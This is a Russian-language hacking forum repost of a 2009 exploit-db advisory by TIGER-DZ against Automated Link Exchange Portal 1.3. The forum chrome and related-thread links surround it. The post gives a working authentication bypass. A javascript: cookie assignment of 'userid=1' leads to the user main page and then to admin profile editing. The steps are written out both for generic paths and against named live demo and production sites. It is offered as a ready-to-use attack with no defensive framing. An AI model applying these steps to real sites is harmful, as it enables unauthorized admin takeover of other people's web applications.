Exploit Automated link exchange portal 1.3 - Multiple Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8904
Проверка EDB
  1. Пройдено
Автор
TIGER-DZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-06-08
Код: 
-------------------------------------------------------------------------
 Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home:www.h4ckx.com
 Script: Automated Link Exchange Portal Version 1.3
 Download:http://www.cmsnx.com/product.demo.php?id=11
 alf mabroke bfowze al montakhabe alwatany :D
 ---------------------------------------------------------------
 Exploit
 -------
 Note:Follow these steps
 
 after enter the cookie (javascript:document.cookie="userid=1;path=/";) and go 
 to login http://www.site.com/[path]/user.mainpage.php and change profile admin at 
  http://www.site.com/[path]/user.edit.account.php 

 exploit= cookie handling + Bypass login + change profile :)
 --------------------------------------------------------------
 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

 -------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.site.com/[path]/user.mainpage.php
 
 ----------------------------------------------------------------
 
 change profile Admin :
 ----------------------------

 http://www.site.com/[path]/user.edit.account.php 

----------------------------------------------------------
 Dem0
 ----
 http://www.kalptarudemos.com/demo/linkspile/
----------------------------------------------------------------

 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

-------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.kalptarudemos.com/demo/linkspile/user.mainpage.php
 
 ----------------------------------------------------------------
 
 change profile Admin :
 ----------------------------

 http://www.kalptarudemos.com/demo/linkspile/user.edit.account.php

----------------------------------------------------------

test:
--------

http://www.linkspile.com/
---------------------------------------------------------------

 Greeting To ALL My Friends (Dz)
 -----------------------------------------------------------------

# milw0rm.com [2009-06-08]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection
Ответы
0
Просмотры
359
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit New Methods in Automated XSS Detection
Ответы
0
Просмотры
457
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Automated Web Application Fingerprinting
Ответы
0
Просмотры
987
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Improving Automated Analysis of Windows x64 Binaries
Ответы
0
Просмотры
340
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Metasploit 3.0 Automated Exploitation
Ответы
0
Просмотры
319
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Using dual-mappings to evade automated unpackers
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)
Ответы
0
Просмотры
345
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Cisco (Multiple Products) - Automated Tool
Ответы
0
Просмотры
299
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit D-Link DSL-2750B - OS Command Injection (Metasploit)
Ответы
0
Просмотры
860
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)
Ответы
0
Просмотры
814
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу